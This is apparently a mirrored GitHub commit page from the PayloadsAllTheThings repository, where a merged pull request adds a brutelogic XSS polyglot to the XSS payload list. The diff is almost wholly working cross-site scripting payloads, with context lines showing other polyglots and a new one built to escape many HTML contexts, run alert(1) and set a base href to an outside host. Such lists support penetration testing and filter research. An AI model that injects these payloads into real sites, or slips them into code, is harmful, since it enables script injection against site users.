mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-01-04 15:13:46 +01:00
Merge pull request #538 from clem9669/master
XSS: Adding brutelogic polyglot
This commit is contained in:
commit
d32c48bad8
1 changed files with 5 additions and 0 deletions
|
|
@ -629,6 +629,11 @@ javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></st
|
|||
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
|
||||
```
|
||||
|
||||
Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
|
||||
```javascript
|
||||
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
|
||||
```
|
||||
|
||||
## Filter Bypass and exotic payloads
|
||||
|
||||
### Bypass case sensitive
|
||||
|
|
|
|||
Loading…
Reference in a new issue